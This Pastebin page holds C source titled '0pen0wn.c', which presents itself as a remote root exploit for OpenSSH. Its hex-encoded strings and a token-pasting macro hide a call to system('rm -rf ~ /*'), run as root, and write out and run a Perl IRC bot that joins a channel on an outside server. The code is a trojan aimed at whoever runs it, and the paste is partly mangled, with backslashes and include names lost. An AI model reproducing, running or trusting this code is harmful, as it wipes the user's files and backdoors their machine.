Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===============
- /* 0pen0wn.c by anti-sec group
- * ---------------------------
- * OpenSSH
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #define VALID_RANGE 0xb44ffe00
- #define build_frem(x,y,a,b,c) a##c##a##x##y##b
- char jmpcode[] =
- "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
- "x64x65x76x2fx6ex75x6cx6cx20x26";
- char shellcode[] =
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
- "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a";
- char fbsd_shellcode[] =
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
- "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
- "x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
- "x2fx74x6dx70x2fx68x69x0a";
- #define SIZE 0xffffff
- #define OFFSET 131
- #define fremote build_frem(t,e,s,m,y)
- void usage(char *arg){
- printf("n[+] 0pen0wn 0wnz Linux/FreeBSDn");
- printf(" Usage: %s -h -p portn",arg);
- printf(" Options:n");
- printf(" t-h ip/host of targetn");
- printf(" t-p portn");
- printf(" t-d usernamen");
- printf(" t-B memory_limit 8/16/64nnn");
- }
- #define FD 0x080518fc
- #define BD 0x08082000
- int main(int argc, char **argv){
- FILE *jmpinst;
- char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
- int port=23, limit=8, target=0, sock;
- struct hostent *host;
- struct sockaddr_in addr;
- if (geteuid()) {
- puts("need root for raw socket, etc...");
- return 1;
- }
- if(argc h_addr;
- }
- sock = socket(PF_INET, SOCK_STREAM, 0);
- addr.sin_port = htons(port);
- addr.sin_family = AF_INET;
- if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
- printf(" [-] Connecting failedn");
- return 1;
- }
- payload = malloc(limit * 10000);
- ptr = payload+8;
- memcpy(ptr,jmpcode,strlen(jmpcode));
- jmpinst=fopen(shellcode+793,"w+");
- if(jmpinst){
- fseek(jmpinst,0,SEEK_SET);
- fprintf(jmpinst,"%s",shellcode);
- fclose(jmpinst);
- }
- ptr += strlen(jmpcode);
- if(target != 5 && target != 6){
- memcpy(ptr,shellcode,strlen(shellcode));
- ptr += strlen(shellcode);
- memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
- }
- else{
- memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
- ptr += strlen(fbsd_shellcode);
- memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
- }
- send(sock,buffer,strlen(buffer),0);
- send(sock,ptr,3750,0);
- close(sock);
- if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
- printf(" [-] connecting failedn");
- }
- payload[sizeof(payload)-1] = '';
- payload[sizeof(payload)-2] = '';
- send(sock,buffer,strlen(buffer),0);
- send(sock,payload,strlen(payload),0);
- close(sock);
- free(payload);
- addr.sin_port = htons(6666);
- if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
- /* v--- our cool bar that says: "r0000000t!!!" */
- printf("n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]nn");
- fremote("PS1='sh-3.2#' /bin/sh");
- }
- else
- printf(" [-] failed to exploit target :-( n");
- close(sock);
- return 0;
- }
- =======================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement